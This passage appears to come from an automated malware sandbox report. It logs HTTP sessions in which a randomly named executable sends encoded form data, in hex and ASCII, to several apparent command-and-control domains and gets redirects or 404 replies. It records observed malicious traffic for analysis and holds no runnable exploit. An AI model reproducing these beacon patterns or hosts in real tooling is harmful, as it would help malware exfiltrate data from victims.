                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.xn72dkd7scx.shop
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.xn72dkd7scx.shop
                                                      Referer: http://www.xn72dkd7scx.shop/emnz/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 6c 44 70 48 36 4b 63 4e 61 66 76 51 73 71 39 32 67 32 33 45 38 4f 32 6d 2f 6b 4b 77 35 6b 48 4a 62 47 4b 37 6e 4f 50 53 75 7a 33 41 77 47 4b 52 33 61 6b 56 79 43 58 2f 33 77 33 55 51 61 4e 31 35 57 61 75 77 76 54 4d 7a 57 4b 69 38 4d 47 47 4b 30 47 43 33 79 42 48 74 35 47 57 76 59 53 2b 35 41 4d 53 70 4d 4b 6d 6f 56 58 4c 55 48 71 61 4b 4a 77 42 68 75 74 6c 2b 6c 78 66 75 4a 36 32 4d 69 6d 42 6c 34 33 47 33 45 57 78 31 4c 47 30 36 75 39 49 6a 32 59 78 44 43 63 50 77 4f 52 31 4c 43 59 6f 63 2f 67 46 79 39 4e 6b 31 69 67 66 30 36 6c 72 76 4d 6e 33 2b 35 56 35
                                                      Data Ascii: lv-=lDpH6KcNafvQsq92g23E8O2m/kKw5kHJbGK7nOPSuz3AwGKR3akVyCX/3w3UQaN15WauwvTMzWKi8MGGK0GC3yBHt5GWvYS+5AMSpMKmoVXLUHqaKJwBhutl+lxfuJ62MimBl43G3EWx1LG06u9Ij2YxDCcPwOR1LCYoc/gFy9Nk1igf06lrvMn3+5V5
                                                      Jul 9, 2024 12:09:03.473615885 CEST | 446 | IN | HTTP/1.1 301 Moved Permanently
                                                      Server: nginx/onex
                                                      Date: Tue, 09 Jul 2024 10:09:03 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: https://www.xn72dkd7scx.shop/emnz/
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                      Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      10 | 192.168.2.9 | 49725 | 134.122.138.60 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:09:05.318238974 CEST | 859 | OUT | POST /emnz/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.xn72dkd7scx.shop
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.xn72dkd7scx.shop
                                                      Referer: http://www.xn72dkd7scx.shop/emnz/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 6c 44 70 48 36 4b 63 4e 61 66 76 51 73 4f 35 32 74 33 33 45 37 75 32 6c 7a 45 4b 77 7a 45 48 4e 62 47 57 37 6e 4b 2f 43 75 47 6e 41 77 6e 36 52 32 62 6b 56 6e 43 58 2f 38 51 33 52 64 36 4e 2b 35 57 65 6d 77 76 66 4d 7a 53 71 69 38 49 4b 47 4a 48 75 42 78 69 42 46 6d 5a 47 55 68 34 53 2b 35 41 4d 53 70 49 69 4d 6f 55 7a 4c 54 30 43 61 4b 6f 77 43 69 75 74 69 2f 6c 78 66 6b 5a 36 36 4d 69 6d 7a 6c 38 32 6a 33 48 75 78 31 4a 4f 30 36 37 42 48 73 32 5a 36 64 79 64 74 30 39 73 45 54 7a 4d 64 52 4d 34 52 77 72 6f 41 32 44 41 42 6c 49 73 77 36 62 6e 51 35 65 63 52 4e 31 44 2f 31 48 64 38 64 49 49 79 42 2b 6d 78 6b 64 65 37 65 51 3d 3d
                                                      Data Ascii: lv-=lDpH6KcNafvQsO52t33E7u2lzEKwzEHNbGW7nK/CuGnAwn6R2bkVnCX/8Q3Rd6N+5WemwvfMzSqi8IKGJHuBxiBFmZGUh4S+5AMSpIiMoUzLT0CaKowCiuti/lxfkZ66Mimzl82j3Hux1JO067BHs2Z6dydt09sETzMdRM4RwroA2DABlIsw6bnQ5ecRN1D/1Hd8dIIyB+mxkde7eQ==
                                                      Jul 9, 2024 12:09:06.086818933 CEST | 446 | IN | HTTP/1.1 301 Moved Permanently
                                                      Server: nginx/onex
                                                      Date: Tue, 09 Jul 2024 10:09:05 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: https://www.xn72dkd7scx.shop/emnz/
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                      Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      11 | 192.168.2.9 | 49726 | 134.122.138.60 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:09:07.931706905 CEST | 1872 | OUT | POST /emnz/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.xn72dkd7scx.shop
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.xn72dkd7scx.shop
                                                      Referer: http://www.xn72dkd7scx.shop/emnz/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 6c 44 70 48 36 4b 63 4e 61 66 76 51 73 4f 35 32 74 33 33 45 37 75 32 6c 7a 45 4b 77 7a 45 48 4e 62 47 57 37 6e 4b 2f 43 75 46 48 41 77 56 79 52 32 34 4d 56 68 79 58 2f 78 77 33 51 64 36 4e 76 35 53 79 69 77 76 44 63 7a 51 53 69 2b 72 43 47 64 69 61 42 34 69 42 46 70 35 47 58 76 59 54 38 35 41 64 5a 70 4d 47 4d 6f 55 7a 4c 54 79 2b 61 4e 35 77 43 6b 75 74 6c 2b 6c 78 44 75 4a 36 65 4d 68 57 4a 6c 38 79 64 30 32 4f 78 37 4a 65 30 38 4a 70 48 68 32 5a 34 63 79 64 4c 30 39 67 66 54 79 67 76 52 4e 38 37 77 73 45 41 6d 30 46 57 2f 4d 30 61 6b 39 7a 36 2f 35 6f 74 41 78 44 5a 37 32 30 56 45 4a 41 42 41 71 79 2f 68 4f 50 4d 4a 41 44 78 79 65 47 41 4e 32 6e 39 64 54 34 4e 6f 55 66 46 72 57 6a 41 4f 4e 62 42 6d 4e 53 56 53 4d 4a 4d 44 75 43 53 6d 65 36 79 4e 47 67 73 67 6c 6c 45 57 4a 61 53 73 57 70 59 47 44 57 4f 4d 47 6e 65 46 4c 4e 56 35 30 4f 68 50 4c 33 34 63 62 41 54 6f 53 38 6f 73 58 6a 42 46 34 71 32 65 4b 76 4b 46 30 44 61 53 69 51 49 62 72 66 75 32 42 52 6b 31 66 2f 57 47 31 35 53 68 5a [TRUNCATED]
                                                      Jul 9, 2024 12:09:08.681819916 CEST | 446 | IN | HTTP/1.1 301 Moved Permanently
                                                      Server: nginx/onex
                                                      Date: Tue, 09 Jul 2024 10:09:08 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: https://www.xn72dkd7scx.shop/emnz/
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                      Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      12 | 192.168.2.9 | 49727 | 134.122.138.60 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:09:10.495851994 CEST | 568 | OUT | GET /emnz/?lv-=oBBn57UjS7mF6OBjtXCA4K/r3FCs+xzFf261ivHj6HGHsVKs3oxX4EX17CbJWppp6g6A8fr9hGSE2paVCFK8/RlnoJvqmanf4TUTsYPUhTHcRSC+WQ==&GJtTF=-FH8yJw HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.xn72dkd7scx.shop
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:09:11.249919891 CEST | 581 | IN | HTTP/1.1 301 Moved Permanently
                                                      Server: nginx/onex
                                                      Date: Tue, 09 Jul 2024 10:09:11 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: https://www.xn72dkd7scx.shop/emnz/?lv-=oBBn57UjS7mF6OBjtXCA4K/r3FCs+xzFf261ivHj6HGHsVKs3oxX4EX17CbJWppp6g6A8fr9hGSE2paVCFK8/RlnoJvqmanf4TUTsYPUhTHcRSC+WQ==&GJtTF=-FH8yJw
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                      Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      13 | 192.168.2.9 | 49728 | 35.212.86.52 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:09:16.606161118 CEST | 844 | OUT | POST /s992/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dynamologistics.net
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.dynamologistics.net
                                                      Referer: http://www.dynamologistics.net/s992/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 57 4e 2b 5a 7a 38 69 67 6e 34 43 6f 58 44 64 75 53 6b 58 67 53 43 4c 51 2b 6e 6f 52 7a 73 6d 4c 58 51 38 57 4a 65 79 51 73 4f 44 77 52 5a 52 45 75 42 39 69 53 50 4f 6d 41 33 75 4b 53 39 30 48 35 30 4e 59 54 5a 47 4c 38 69 30 35 45 70 70 79 72 61 32 56 31 70 79 52 74 6b 46 41 53 77 6b 7a 4b 52 62 52 6f 63 77 71 43 30 66 38 41 75 53 75 7a 34 36 64 55 44 4c 77 45 71 5a 71 6b 39 41 2f 4d 53 79 70 52 54 75 48 75 65 6c 38 61 6e 5a 58 56 44 70 50 41 2f 6d 62 57 6b 77 50 74 56 4c 76 33 61 79 4d 67 46 39 44 6a 34 7a 64 49 45 4d 33 5a 4e 44 65 6b 44 32 70 78 38 68 6b
                                                      Data Ascii: lv-=WN+Zz8ign4CoXDduSkXgSCLQ+noRzsmLXQ8WJeyQsODwRZREuB9iSPOmA3uKS90H50NYTZGL8i05Eppyra2V1pyRtkFASwkzKRbRocwqC0f8AuSuz46dUDLwEqZqk9A/MSypRTuHuel8anZXVDpPA/mbWkwPtVLv3ayMgF9Dj4zdIEM3ZNDekD2px8hk
                                                      Jul 9, 2024 12:09:17.054672003 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 09 Jul 2024 10:09:17 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      X-Httpd-Modphp: 1
                                                      Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                      X-Proxy-Cache-Info: DT:1
                                                      Content-Encoding: gzip


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      14 | 192.168.2.9 | 49729 | 35.212.86.52 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:09:19.190130949 CEST | 868 | OUT | POST /s992/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dynamologistics.net
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.dynamologistics.net
                                                      Referer: http://www.dynamologistics.net/s992/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 57 4e 2b 5a 7a 38 69 67 6e 34 43 6f 58 67 31 75 43 79 66 67 46 53 4c 54 39 6e 6f 52 36 4d 6d 51 58 51 77 57 4a 65 61 41 73 63 33 77 55 4e 64 45 67 67 39 69 52 50 4f 6d 5a 48 75 46 4e 74 31 71 35 30 42 51 54 63 2b 4c 38 68 49 35 45 74 68 79 73 70 65 57 76 5a 79 45 6c 45 46 43 66 51 6b 7a 4b 52 62 52 6f 63 4e 50 43 30 58 38 41 39 4b 75 7a 62 69 63 59 6a 4c 7a 42 61 5a 71 67 39 41 37 4d 53 79 62 52 53 6a 69 75 59 68 38 61 6d 70 58 55 53 70 51 4a 2f 6d 42 53 6b 78 54 70 41 75 56 79 4c 36 52 6a 57 70 67 69 6f 75 36 4c 6c 73 70 49 2f 4b 46 78 55 32 4f 32 62 6f 4d 76 35 31 69 77 64 56 38 4d 37 46 39 54 55 2b 56 34 37 77 50 2b 41 3d 3d
                                                      Data Ascii: lv-=WN+Zz8ign4CoXg1uCyfgFSLT9noR6MmQXQwWJeaAsc3wUNdEgg9iRPOmZHuFNt1q50BQTc+L8hI5EthyspeWvZyElEFCfQkzKRbRocNPC0X8A9KuzbicYjLzBaZqg9A7MSybRSjiuYh8ampXUSpQJ/mBSkxTpAuVyL6RjWpgiou6LlspI/KFxU2O2boMv51iwdV8M7F9TU+V47wP+A==
                                                      Jul 9, 2024 12:09:19.652714014 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 09 Jul 2024 10:09:19 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      X-Httpd-Modphp: 1
                                                      Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                      X-Proxy-Cache-Info: DT:1
                                                      Content-Encoding: gzip
                                                      Data Ascii: u*3(McTn@j+i#If,iLRAM)A35X4Z4R4O%MI&QiiQi%<\0.Npnx6%p-d7c8mKL{a/J\|Q\Lcy@6I$]kLY{$4-@Qffj#IhRI<A{$4,A3Y,OH
                                                      Jul 9, 2024 12:09:19.653120995 CEST1236INData Raw: 69 4f 74 18 de 84 9b f6 84 6b 11 5d 74 29 ee e9 b3 e9 b4 88 2e 3a 2d 92 8b 4e 8b e8 a2 4b f1 cc 45 74 86 d3 22 3a d9 b4 4c 2e 94 8b e8 e4 4a 51 4c 7e 14 67 17 1a 2b c6 d2 b2 39 99 30 23 83 fb 65 22 c8 65 73 12 25 60 de 3d 16 d8 2a 11 1b 17 8c f2
                                                      Data Ascii: iOtk]t).:-NKEt":L.JQL~g+90#e"es%`=*F$,u`A783hTp4M j^A~AQfl?-haX+c;Z0 <V'1e;*Ut`mZjE1~ndliLa0\HbS {D|W
                                                      Jul 9, 2024 12:09:19.653155088 CEST1236INData Raw: c4 10 c3 51 0d 91 8e 35 1e 71 0a 22 d2 a5 78 9e 24 14 8e 9a 10 1b 6b 3e a2 2e 0b 71 a5 68 96 30 14 8b ca 10 93 0b 20 82 2e 0e 11 25 60 9e 3c 4a bb 61 17 a6 67 03 81 d9 42 cc 34 8f 8b 37 78 e0 c8 71 c9 03 f7 89 e0 f5 7d a3 7c 84 67 ca 43 87 4b 1e
                                                      Data Ascii: Q5q"x$k>.qh0 .%`<JagB47xq}|gCKS<DP8Ct~R<S'yMJy+EXG`3aJQwNO@xX%CLl6T'-=y6*_l|I<dKaOd%8UI't<dslX5
                                                      Jul 9, 2024 12:09:19.653191090 CEST1236INData Raw: e5 d5 e4 15 8a 2f f4 b8 9a 18 95 8a 91 25 9b eb a6 50 39 31 8a c1 41 d8 0d 8e b3 a6 09 98 a7 62 86 92 8a c9 23 9d 12 95 8a 49 94 a0 99 2a 66 2c a9 98 4c d2 a9 f2 41 15 93 29 41 33 55 cc 58 52 31 99 a4 53 a1 54 31 99 52 34 4f c5 8c 25 15 93 49 42
                                                      Data Ascii: /%P91Ab#I*f,LA)A3UXR1ST1R4O%IB*&QbH(o<=6jq1eC[Tw$bMKNbU'L'Xz8E3R)iRH4HM-$RIN4HH%D)K{<v,$'-e.v!
                                                      Jul 9, 2024 12:09:19.657960892 CEST1236INData Raw: 2a b9 4a 51 b8 94 2f fa 14 cf 54 be c2 a9 20 45 c7 a2 8a 30 4b 52 6c 29 fc 7c 51 6a b9 86 9b 06 62 07 c4 30 69 65 9b 13 61 03 54 df 8c c9 a6 9d 70 83 66 d1 76 57 b8 65 76 6b bb f4 d4 43 d8 d1 c8 0e 28 7a fb 15 ef 89 3a bb 5d 0f 39 c2 ab f7 6c 26
                                                      Data Ascii: *JQ/T E0KRl)|Qjb0ieaTpfvWevkC(z:]9l&KE}MyO{=[OHp(M gbf=Y2^rst#%ytsNUR:K&"e1et-p*o&-^,CHDCi3khRK=yO


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      15 | 192.168.2.9 | 49730 | 35.212.86.52 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:09:21.776390076 CEST | 1881 | OUT | POST /s992/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dynamologistics.net
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.dynamologistics.net
                                                      Referer: http://www.dynamologistics.net/s992/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:09:22.229559898 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 09 Jul 2024 10:09:22 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      X-Httpd-Modphp: 1
                                                      Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                      X-Proxy-Cache-Info: DT:1
                                                      Content-Encoding: gzip


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      16 | 192.168.2.9 | 49731 | 35.212.86.52 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:09:24.363899946 CEST | 571 | OUT | GET /s992/?GJtTF=-FH8yJw&lv-=bPW5wL+6+Zn0FmJaaGSlZRyF0EkywNPIdxoHB7misPGpWoJmvT99WPeeVFPeE+QW7lFzZIe3p3wvC9c3tru/to3skHw9ZCkuDTXhooUuE0PnQLiimQ== HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.dynamologistics.net
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:09:24.824593067 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 09 Jul 2024 10:09:24 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      X-Httpd-Modphp: 1
                                                      Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
                                                      X-Proxy-Cache: MISS
                                                      X-Proxy-Cache-Info: 0 NC:000000 UP:


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      17 | 192.168.2.9 | 49732 | 188.114.97.3 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:09:30.239032030 CEST | 832 | OUT | POST /srh8/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.globaltrend.xyz
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.globaltrend.xyz
                                                      Referer: http://www.globaltrend.xyz/srh8/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Ascii: lv-=FSwoOmqr8YoFMhACXcDGSMJLWP0N7k98NTdLFUyQvH16BsmtWGocBNul8970UfG6tqtlbzd6FoYvn6JTYz/vTXH5C/dyRUmWReIGkUY5sVYD5AjFUgbPwBFW8WWxRhUxXkhIQgAa7MS4TbfS7eRotYlH7ljG1M2LHyKjrwBlaLP+5nzTjjAnkv/9CjNY


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      18 | 192.168.2.9 | 49733 | 188.114.97.3 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:09:32.817975044 CEST | 856 | OUT | POST /srh8/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.globaltrend.xyz
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.globaltrend.xyz
                                                      Referer: http://www.globaltrend.xyz/srh8/
